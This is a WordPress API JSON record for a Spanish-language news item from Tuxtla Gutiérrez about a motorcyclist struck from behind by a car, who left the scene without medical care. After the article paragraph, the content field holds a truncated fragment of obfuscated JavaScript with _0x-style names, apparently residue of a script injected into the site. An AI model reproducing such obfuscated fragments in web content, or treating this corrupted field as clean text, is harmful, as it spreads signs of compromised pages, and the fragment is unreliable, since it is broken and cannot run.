{"id":4142,"date":"2022-08-05T02:19:08","date_gmt":"2022-08-05T02:19:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4142"},"modified":"2022-08-05T02:19:09","modified_gmt":"2022-08-05T02:19:09","slug":"atropellan-a-motociclista-en-la-bienestar-social","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4142","title":{"rendered":"Atropellan a motociclista en la Bienestar Social"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"893\" height=\"544\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1659665762757.jpg\" alt=\"\" class=\"wp-image-4143\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1659665762757.jpg 893w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1659665762757-300x183.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1659665762757-768x468.jpg 768w\" sizes=\"auto, (max-width: 893px) 100vw, 893px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista result\u00f3 con lesiones en sus extremidades luego de ser embestido por un autom\u00f3vil cuando circulaba en el Bulevar \u00c1ngel Albino Corzo, a la altura de la Colonia Bienestar Social en la zona Oriente de Tuxtla.De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando el motociclista circulaba en el citado Bulevar y Calle Vict\u00f3rico Grajales en el sentido de Poniente a Oriente cuando un coche particular lo golpe\u00f3 en la parte trasera lo que hizo que saliera proyectado y se impactara contra el pavimento.Por el golpe present\u00f3 una lesiones en su pie izquierdo.  La v\u00edctima no quiso recibir atenci\u00f3n m\u00e9dica y levant\u00f3 su unidad y se march\u00f3 del lugar. Sobre el responsable nada se supo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista result\u00f3 con lesiones en sus extremidades luego de ser embestido por un autom\u00f3vil cuando circulaba en el Bulevar \u00c1ngel Albino Corzo, a la altura de la Colonia Bienestar Social en la zona Oriente de Tuxtla.De acuerdo con los reportes oficiales, este hecho &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4143,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4142","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4142"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4142\/revisions"}],"predecessor-version":[{"id":4144,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4142\/revisions\/4144"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4143"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4142"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}